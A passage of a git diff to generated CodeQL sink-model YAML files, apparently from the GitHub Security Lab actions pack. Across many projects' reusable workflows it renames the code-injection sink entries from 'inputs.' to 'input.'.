\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml
index 0888318ad93c..793136cc3d3a 100644
--- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.namespace-repository", "code-injection", "generated"]
- - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.file-dir", "code-injection", "generated"]
- - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.build-args", "code-injection", "generated"]
\ No newline at end of file
+ - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"]
+ - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.file-dir", "code-injection", "generated"]
+ - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.build-args", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml
index 6ea6dcdab704..e46601a7bff0 100644
--- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"]
- - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"]
\ No newline at end of file
+ - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"]
+ - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml
index 2c18a166cc1f..558ff908edf1 100644
--- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"]
- - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"]
\ No newline at end of file
+ - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"]
+ - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml
index f065947dbdcc..a477e289d9ef 100644
--- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "inputs.connector", "code-injection", "generated"]
\ No newline at end of file
+ - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml
index 438525e77e23..a72ace81445d 100644
--- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"]
\ No newline at end of file
+ - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml
index ca3111ad03af..26c0794a19c8 100644
--- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"]
\ No newline at end of file
+ - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml
index 1e09e05e8b62..5ad39d5e184f 100644
--- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file + - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index ad061ca714da..3c790f81d747 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.module", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.jdk", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.sql_compatibility", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.override_config_path", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.testing_groups", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.use_indexer", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.runtime_jdk", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.it", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.script", "code-injection", "generated"] - - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.build_jdk", "code-injection", "generated"] \ No newline at end of file + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.sql_compatibility", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.override_config_path", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.testing_groups", "code-injection", "generated"] + - 
["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.use_indexer", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "input.runtime_jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.it", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.script", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "input.build_jdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 3a721a0f2cf9..50fdcfd5a2d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.environment", "code-injection", "generated"] - - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index bdabbb9ab609..6363564503c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.branch", "code-injection", "generated"] - - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index 6d8438462a8c..fce736676fea 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "inputs.pytestArgs", "code-injection", "generated"] \ No newline at end of file + - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 6d7bf7af0c2d..593322a739eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] - - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] - - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index b3b198fbf653..b3984a7ab831 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] - - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] - - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index 9c3ae9bf1946..a6f1bd4569db 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "inputs.dist-tag", "code-injection", "generated"] \ No newline at end of file + - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index 68a85006c6cc..b661a1fa26aa 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "inputs.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file + - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index ee336ee076c8..0f58971041d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "inputs.terraform_workingdir", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.parameters-file", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.workspace_name", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.resource_group", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.dockerfile-location", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.environment_file", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.workspace_name", "code-injection", "generated"] - - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.resource_group", "code-injection", "generated"] \ No newline at end of file + - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.parameters-file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.resource_group", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.dockerfile-location", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.environment_file", "code-injection", "generated"] + - 
["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "input.resource_group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index 3d3f727923a0..f12a337d71dd 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] - - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.track", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index f18d1e4c50ab..76796b4ae383 100644 
--- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] - - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.track", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 21db2585a5e8..8cc08edff5d6 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.shell", "code-injection", "generated"] - - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.environment", "code-injection", "generated"] \ No newline at end of file + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index 3f263608c21b..c2963eb76f45 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index 017d0bc89f53..66aea90b41a6 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file + - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 1a38d6b35ade..49ed7bca899b 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] - - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_NAME", "code-injection", "generated"] - - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_NAME", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index 339d7b1dd0a2..fd0a2d9110a9 100644 
--- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "inputs.features", "code-injection", "generated"] \ No newline at end of file + - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index ff0f83454c2d..1a3bdd1b3803 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml 
@@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.runner", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.config_file", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wamr_app_framework_url", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.ver_num", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.runner", "code-injection", "generated"] - - 
["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.os", "code-injection", "generated"] - - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.binary_name_stem", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.config_file", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.wasi_sdk_url", "code-injection", "generated"] + - 
